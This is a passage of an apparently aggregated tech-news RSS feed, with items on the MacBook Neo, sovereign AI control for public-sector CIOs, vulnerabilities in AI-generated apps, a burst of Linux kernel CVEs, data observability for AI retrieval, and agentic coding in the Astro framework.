<p class="wp-block-paragraph">Just four months after the Neo’s rollout, Apple is already in position to leak rumors of an even more computationally capable follow-up, while competitors struggle to compete with the original on performance, build quality, and price. Still, the Neo might get more expensive, reporting warns, with the lowest-price 256GB model now gone, making the $599 Mac a mirage we can only wistfully hope to see again. </p>



<p class="wp-block-paragraph">That might matter less in context, as PC makers everywhere boost prices while RAM, chips, and storage prices head north, along with transport, logistics, and energy costs. “While [Apple] did raise prices in line with the broader market, it still remains well positioned against rivals facing the same cost pressures,” said Jean Philippe Bouchard, vice president for consumer devices at IDC. </p>



<p class="wp-block-paragraph">“As market conditions continue to worsen, the importance of supply chain management and capabilities are increasingly important,” Bouchard said. “The largest vendors, with their buying power and long-standing supplier ties, are best positioned to take share from smaller rivals.”</p>



<h2 class="wp-block-heading"><strong>This was never about luck</strong></h2>



<p class="wp-block-paragraph">This isn’t solely a market take about competition, it’s about planning.</p>



<p class="wp-block-paragraph">Few in the industry seemed prepared for the massive memory price increases that hit this year. Apple clearly planned its low-cost Mac well before that happened, hoping to seize the PC market at the low-mid-range. This is precisely what it seems to have done, what it continues to do, and what it will continue to do.</p>



<p class="wp-block-paragraph">The recent reports that it has a successor planned shows the breadth of the Mac company’s strategic vision, as Apple has quite clearly sought to fully exploit the failings of Windows and the internal contradictions of a value-conscious industry in stiff competition with itself.</p>



<p class="wp-block-paragraph">With the first M-series Macs about to enter the replacement cycle, Apple has built a market it can capitalize on for at least a decade, meaning it already has a vision for PC sales that extends at least as far. That’s the kind of road map corporate purchasers want when they make platform deployment decisions, which is why Apple’s 10% share gains are the beginning of <a href="https://www.computerworld.com/article/4150717/hexnode-ceo-macbook-neo-forces-it-to-rethink-its-budget-laptop-strategy.html">even more significant market change</a>. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Thu, 23 Jul 2026 11:05:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI code vulnerabilities that grow with your app]]></title>
<description><![CDATA[Theori built 28 apps with AI coding agents and scanned each one through its pentesting platform. Five models did the building, split between Anthropic and OpenAI, across apps written from a spec, thrown together from a casual prompt, and rewritten from an aging PHP codebase. The team went in expe...]]></description>
<link>https://tsecurity.de/de/3688038/it-security-nachrichten/the-ai-code-vulnerabilities-that-grow-with-your-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688038/it-security-nachrichten/the-ai-code-vulnerabilities-that-grow-with-your-app/</guid>
<pubDate>Thu, 23 Jul 2026 07:16:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Theori built 28 apps with AI coding agents and scanned each one through its pentesting platform. Five models did the building, split between Anthropic and OpenAI, across apps written from a spec, thrown together from a casual prompt, and rewritten from an aging PHP codebase. The team went in expecting injection everywhere. SQL injection, cross-site scripting, the bugs that fill security tutorials. Those barely showed up. The models reached for prepared statements and ORMs on … <a href="https://www.helpnetsecurity.com/2026/07/23/report-ai-code-vulnerabilities/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/23/report-ai-code-vulnerabilities/">The AI code vulnerabilities that grow with your app</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Kernel Team Publishes 432 CVEs In Two Days]]></title>
<description><![CDATA[Ancient Slashdot reader alanw shares a post from the OSS Security mailing list, where sysadmin Jan Schaumann wonders what to do after the Linux kernel cranked out 432 CVEs in a little over 24 hours: "I understand the position that CVEs were always a flawed way to track or prioritize security chan...]]></description>
<link>https://tsecurity.de/de/3687597/linux-tipps/linux-kernel-team-publishes-432-cves-in-two-days/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687597/linux-tipps/linux-kernel-team-publishes-432-cves-in-two-days/</guid>
<pubDate>Wed, 22 Jul 2026 23:06:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ancient Slashdot reader alanw shares a post from the OSS Security mailing list, where sysadmin Jan Schaumann wonders what to do after the Linux kernel cranked out 432 CVEs in a little over 24 hours: "I understand the position that CVEs were always a flawed way to track or prioritize security changes... But this onslaught really shows it's not feasible to attempt to prioritize individual kernel changes. I'm not sure what to do here going forward." The Register reports: The nixCraft team speculated on social media that AI bug reports are a likely reason for all those kernel CVEs, which wouldn't be without precedent - Linus Torvalds himself said in May that the Linux kernel security mailing list had become "almost entirely unmanageable" due to AI-assisted bug hunting. Nonetheless, Torvalds has described AI as a useful tool for Linux development while still noting it can be a drag for maintainers, both from a workload standpoint and the fact "it keeps finding embarrassing bugs." [...]
 
Unfortunately for Linux sysadmins, the position in which they find themselves in this current mess isn't one that's readily solved. CVEs might be a messy way to track and prioritize security updates, especially when hundreds of them are published over a short period, but without something better, it falls to IT and security teams to determine which vulnerabilities affect their systems and which kernel updates they need to deploy. Senior kernel maintainer Greg Kroah-Hartman replied to Jan's post, pushing back on the idea that the kernel's CVE volume is uniquely unmanageable. The kernel isn't special, he argues -- companies everywhere are finally realizing they need to re-evaluate how they update all of their systems and devices, something that's traditionally been "woefully ignored."
 
On the "just always update" approach, Greg says that's precisely what the kernel community endorses: "This is what the kernel developer community recommends and supports. If you want support from us, do this." Can't manage it yourself? Pay a company for support, or "just use Debian or Yocto as their security practices are amazing." He points to Android as proof the approach scales, calling it "the largest deployment of software in the world" -- billions of devices kept updated "with one very-overworked developer guiding it all."
 
As for reviewing every CVE individually, he notes this can be largely automated by intersecting the files a CVE touches with the files you actually build, which typically trims the relevant set "down to about 10% of the overall total" -- the approach enterprise distros already take for their customers. Panic-mode selective patching gets a blunt "Good luck with that!" -- regulations like the EU's Cyber Resilience Act are set to legislate that habit away ("rightfully so," in his view), and "your insurance company might wish to have a talk with you as well."
 
Greg also warns the flood isn't over: "The number of llm-found issues is only on the rise right now, it's going to be a very long 18 months at the least to dig ourselves out of this mess, and people had BETTER be updating their systems all along the way if they expect to be secure in any way." As for the 432-CVE burst itself, he explains it was simply him catching up on a weeks-old, publicly visible review queue over the weekend -- delayed by "a perfect storm of 6 weeks straight of conferences and vacations" -- so it shouldn't have come as a surprise to anyone watching the public git repo.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linux+Kernel+Team+Publishes+432+CVEs+In+Two+Days%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F22%2F2033256%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F22%2F2033256%2Flinux-kernel-team-publishes-432-cves-in-two-days%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/07/22/2033256/linux-kernel-team-publishes-432-cves-in-two-days?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents aren't confidently wrong because of bad context — they're wrong because of bad data engineering]]></title>
<description><![CDATA[You spend weeks tuning an AI chatbot. Answers are accurate. Stakeholders sign off, and you ship it. Three months later, the system is confidently wrong about a third of what users ask. Nobody changed the model, and nobody touched the prompts. The world moved, pricing changed, a policy updated, a ...]]></description>
<link>https://tsecurity.de/de/3687580/it-nachrichten/ai-agents-arent-confidently-wrong-because-of-bad-context-theyre-wrong-because-of-bad-data-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687580/it-nachrichten/ai-agents-arent-confidently-wrong-because-of-bad-context-theyre-wrong-because-of-bad-data-engineering/</guid>
<pubDate>Wed, 22 Jul 2026 22:58:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>You spend weeks tuning an AI chatbot. Answers are accurate. Stakeholders sign off, and you ship it. Three months later, the system is confidently wrong about a third of what users ask. Nobody changed the model, and nobody touched the prompts. The world moved, pricing changed, a policy updated, a product spec shipped a new version, and the underlying knowledge store didn't move with it.</p><p>This is not a hypothetical. It's one of the most common production failure modes in enterprise AI right now, and most data engineering teams don't have the right tooling to catch it, regardless of how the AI system retrieves the data.</p><h2>The failure that doesn't look like a failure </h2><p>An AI application doesn't care whether it's retrieving from a vector store, a document index, or an API call. Whatever the mechanism, nothing in a standard retrieval pipeline checks whether what it's serving is still correct. A stale pricing document retrieves just as confidently as a current one, because the system is scoring relevance or availability, not correctness. A record with a silently missing field passes through just as cleanly as a complete one, for the same reason.</p><p>So the failure is invisible by design. Outdated or incomplete data still scores high on relevance, or passes every check a data pipeline was built to run. The model answers with full confidence because the retrieved context looks authoritative. Every dashboard you're watching stays green. The system looks like it's working. It's just wrong.</p><p>I’ve watched a similar version of this happen outside the AI context, in a fintech pipeline. An upstream system changed a field without notifying downstream users. The pipeline did not fail; it simply propagated bad values into dashboards because the system only checked whether the job completed, not whether the data was still correct. The issue surfaced only when a customer noticed something inconsistent. By then, the bad data had already moved downstream. </p><p>Whether it's a document that's gone stale or a field that's gone silently missing, the failure shape is the same: the absence of an error is not the presence of correctness, and without building proper validation layers, nothing in the pipeline could identify the problem.</p><h2>Why this is a data engineering problem</h2><p>Teams that hit this failure tend to misdiagnose it, and they tend to do it twice.</p><p><b>Blaming the model: </b>The first instinct is to blame the model, try a different LLM, adjust the prompt. The real problem lies further upstream, at the data engineering layer, the same instinct behind the fintech failure above: monitoring built for the pipeline, not the data.</p><p><b>Blaming the retrieval layer: </b>Once the model's ruled out, the next instinct is to blame the retrieval or context layer instead and buy a better one. The timing isn't a coincidence: as enterprises push these systems into the real production world, this gap is exactly what's starting to surface, and the vendor response has been everywhere. </p><ul><li><p>AWS just<a href="https://venturebeat.com/data/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation"> entered the "context layer" race</a> with a knowledge graph that learns from agent usage. </p></li><li><p>Snowflake's new Horizon Context and Cortex Sense target the exact symptom<a href="https://venturebeat.com/data/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem"> this piece opened with</a>: agents giving confident wrong answers because nothing governs the business logic underneath them. </p></li></ul><p>Both are real responses to a real problem, but they sit one layer above it; a knowledge graph still depends on whatever feeds it.</p><p>The real problem lies further upstream, at the data engineering layer. Teams check whether a job ran, not whether the data it moved is still true, an instinct that predates AI by years. Monitoring is built for the pipeline, not for the data. </p><h2>What's actually missing: Data observability</h2><p>Data observability is a well-known concept that doesn't get enough attention in how it's actually implemented. The relevant metric isn't a percentage — it's coverage: what fraction of critical datasets have lineage that's actually queryable, versus only living in someone's head.</p><p>Uber built a <a href="https://www.uber.com/in/en/blog/operational-excellence-data-quality/">dedicated data quality and observability platform</a> long before retrieval-augmented generation existed. Their Unified Data Quality platform supports more than 2,000 critical datasets and detects around 90% of data quality incidents before they reach downstream consumers.</p><p>Netflix solved a different piece of the same problem, <a href="https://netflixtechblog.com/building-and-scaling-data-lineage-at-netflix-to-improve-data-infrastructure-reliability-and-1a52526a7977">building a company-wide data lineage system</a> so anyone could answer where a dataset came from and what touched it along the way. It maps dependencies across Kafka topics, ML models, and experimentation, not just warehouse tables. Similar to Uber, the platform was built for humans and now it has become more important with the rise in AI/LLM applications.</p><p>Between them, Uber and Netflix cover two of the four things worth building for. In practice, I think about it as four dimensions, each measurable on its own terms.</p><p><b>Correctness:</b> Does each record conform to the shape and rules it's supposed to, right field types, no unexpected nulls, values in range. Tools like<a href="https://greatexpectations.io/"> Great Expectations</a> and <a href="https://soda.io/">Soda</a> handle this well: automated row and column-level validation instead of manual checks after something breaks. Track percentage of records passing validation per run.</p><p><b>Freshness:</b> Is the data still current relative to its source, not just current as of its last check. Track time since last successful update per source, with an SLA per dataset rather than one blanket threshold, since some sources need hourly refresh and others don't.</p><p><b>Consistency:</b> Does the same fact read the same way everywhere it's stored or indexed. This fails silently, it only shows up when two systems fed by the same source start disagreeing. A periodic cross-check between downstream destinations, flagging mismatch rate above a threshold, is enough to catch it early.</p><p><b>Lineage:</b> Can you trace any output back to its source and every transform it passed through, the same question Netflix built its system to answer. </p><p>None of this requires infrastructure most data teams don't already have. I know because I've built it, not just argued for it.</p><p>At <a href="https://www.socure.com/">Socure</a>, client data arrived in whatever shape the client felt like sending it, and occasionally, quietly wrong. The challenge was building a system where incorrect data could be identified before it propagated downstream. The same principles applied: Validate what arrived, understand where it came from, and prevent bad data from becoming someone else's problem.</p><p>Great Expectations became part of that foundation: schema and range validation at ingestion, per-source SLAs for freshness, cross-system checks for consistency, and file-level lineage. All of it sat behind a <a href="https://aws.amazon.com/blogs/big-data/build-write-audit-publish-pattern-with-apache-iceberg-branching-and-aws-glue-data-quality/">write-audit-publish</a> pattern, where data landed in staging, was validated, and only moved downstream if it passed the required checks.</p><p>The result showed up downstream: better accuracy across the board, in reporting, in the ML models, and in AI retrieval built on top of that same data.</p><h2>What to do Monday morning</h2><p>If you're running retrieval-based AI systems in production, the diagnostic question isn't which model to try next or which retrieval architecture to migrate to. It's four narrower questions: </p><ul><li><p>Is the underlying data validated against the standards required by its consumers?</p></li><li><p>What's the oldest piece of content currently being served with high confidence?</p></li><li><p>Would two chunks of the same source ever disagree with each other in the same retrieval result?</p></li><li><p>Could you trace where it came from if it turned out to be wrong?</p></li></ul><p>If you can't answer those questions, then the gap lies in the pipeline between your source systems and whatever your agent reads from. That’s a data engineering fix, not a model swap or a vendor migration.</p><p>Whether you're building reporting pipelines, ML systems, or AI agents, correctness, freshness, consistency, and lineage are what make data trustworthy. AI simply exposes weaknesses that have existed in data engineering all along. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nobody Owns the Risk: Why Unclear Ownership Creates Cyber Drift]]></title>
<description><![CDATA[Short answer 
Unclear ownership becomes a cyber risk condition when people do not know who is responsible for a decision, behavior, process, exception, or outcome. In modern human risk management, this matters because cyber risk often sits across security, IT, HR, legal, procurement, operations, ...]]></description>
<link>https://tsecurity.de/de/3686439/it-security-nachrichten/nobody-owns-the-risk-why-unclear-ownership-creates-cyber-drift/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686439/it-security-nachrichten/nobody-owns-the-risk-why-unclear-ownership-creates-cyber-drift/</guid>
<pubDate>Wed, 22 Jul 2026 15:14:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://cybermaniacs.com/cm-blog/nobody-owns-the-risk-why-unclear-ownership-creates-cyber-drift" title="" class="hs-featured-image-link"> <img src="https://cybermaniacs.com/hubfs/Blog%20Header%20Graphics/Personally-Identifiable-Information_-Why-is-it-important-for-cybersecurity__Header.jpg" alt="Nobody Owns the Risk: Why Unclear Ownership Creates Cyber Drift" class="hs-featured-image"> </a> 
</div> 
<h2><strong><span>Short answer</span></strong></h2> 
<p><span>Unclear ownership becomes a cyber risk condition when people do not know who is responsible for a decision, behavior, process, exception, or outcome. In modern human risk management, this matters because cyber risk often sits across security, IT, HR, legal, procurement, operations, communications, vendors, and business leaders. When ownership is spread everywhere but clarified nowhere, risk does not disappear. It drifts.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic coding is everywhere]]></title>
<description><![CDATA[I use a very cool and relatively new web framework called Astro. The keen insight that the Astro team had was that most websites are made up of static content, so they made it really easy to add content to a website. To add a blog post to my personal website, all I have to do is create a Markdown...]]></description>
<link>https://tsecurity.de/de/3685748/ai-nachrichten/agentic-coding-is-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685748/ai-nachrichten/agentic-coding-is-everywhere/</guid>
<pubDate>Wed, 22 Jul 2026 11:04:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I use a very cool and relatively new web framework called <a href="https://www.infoworld.com/article/3842325/designing-a-dynamic-web-application-with-astro-js.html" data-type="link" data-id="https://www.infoworld.com/article/3842325/designing-a-dynamic-web-application-with-astro-js.html">Astro</a>. The keen insight that the Astro team had was that most websites are made up of static content, so they made it really easy to add content to a website. To add a blog post to <a href="https://nickhodges.com/">my personal website</a>, all I have to do is create a Markdown file with some front matter, deploy it, and the blog post automatically appears. If I need to reach deeper for more dynamic functionality, I can easily do that with <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" data-type="link" data-id="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript</a>, <a href="https://www.infoworld.com/article/2253289/react-tutorial-get-started-with-the-reactjs-javascript-library.html" data-type="link" data-id="https://www.infoworld.com/article/2253289/react-tutorial-get-started-with-the-reactjs-javascript-library.html">React</a>, or almost any other framework. It’s really cool.</p>



<p class="wp-block-paragraph">And these days, I really don’t write any code. <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html" data-type="link" data-id="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a> does most (all?) of the work. Since Astro is <a href="https://github.com/withastro/astro">an open-source project</a> and has <a href="https://docs.astro.build/">excellent documentation</a>, Claude knows all about how Astro works. It has no trouble at all managing my site and making the improvements I ask for.  </p>



<p class="wp-block-paragraph">And that got me thinking, how does Astro get built? Is the Astro team building with agentic coding? Astro itself has many dependencies, including big projects like Vite and Node. And of course, Vite and Node have dependencies, too. Are those dependencies being developed by hand, or are those development teams also using AI agents to code?</p>



<p class="wp-block-paragraph">My curiosity got the best of me, and I asked Claude to dig deeper. It turns out that the Astro repository has <a href="https://github.com/withastro/astro/blob/main/AGENTS.md">an AGENTS.md</a> file, and some of the commits even have commit message trailers indicating that they were at least co-authored by Claude and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" data-type="link" data-id="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>. Further down, there is a <code>.agents/skills</code> directory with skills covering development, merging, triage, and more. I poked around for a look, and someone has done a great job building agentic support.</p>



<p class="wp-block-paragraph">Now my interest is really piqued, and further investigation reveals quite a bit of interesting stuff. About a year ago, documentation started appearing about how to build Astro sites with coding agents.  Around that same time, the docs team released an <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP server</a> that gives developers coding agents deeper, easier access to the Astro documentation.  </p>



<p class="wp-block-paragraph">And there are small steps in the Astro codebase that indicate it is “agentic ready.” For instance, the command-line development server can tell when it is being started by an agent, and the application itself can tell if it is being driven by an agent. Small things, but steps in the direction of embracing Astro developers who use coding agents. </p>



<p class="wp-block-paragraph">Okay, that was a fun spelunking trip. But so what?</p>



<p class="wp-block-paragraph">The “so what” is that code is going to be commoditized. As an Astro developer I am using AI agents pretty much all of the time. The Astro development team is starting to use AI agents more and more. The folks building the Astro dependencies are using AI agents. Shoot, the people building Claude Code and the agents themselves are “eating their own dogfood” and <a href="https://www.anthropic.com/institute/recursive-self-improvement">using their own tools to build the next frontier model</a>. Before we know it, it will be <a href="https://en.wikipedia.org/wiki/Turtles_all_the_way_down">turtles all the way down</a>. </p>



<p class="wp-block-paragraph">No one says “who generated that electricity?” or “who wove the fabric in that shirt?” any more. And it won’t be long before no one says “Who wrote the code for that app?” because it won’t matter. Just as we don’t look at the assembly code written by our compilers, we’ll stop looking at the “regular” code written by our agents. I’m not even sure anyone is <a href="https://news.ycombinator.com/item?id=39587051" data-type="link" data-id="https://news.ycombinator.com/item?id=39587051">writing assembly code anymore</a>. Soon we’ll be saying that about TypeScript, Python, and C++.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 153 Released]]></title>
<description><![CDATA[Longtime Slashdot reader williamyf writes: FireFox 153 was released today. The most important user-facing changes are improvements to PDF handling (you can now merge PDFs and add images to them), and HDR video playback (on Windows, provided HDR is active systemwide). Other under-the-hood changes ...]]></description>
<link>https://tsecurity.de/de/3684870/it-security-nachrichten/firefox-153-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684870/it-security-nachrichten/firefox-153-released/</guid>
<pubDate>Tue, 21 Jul 2026 23:13:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
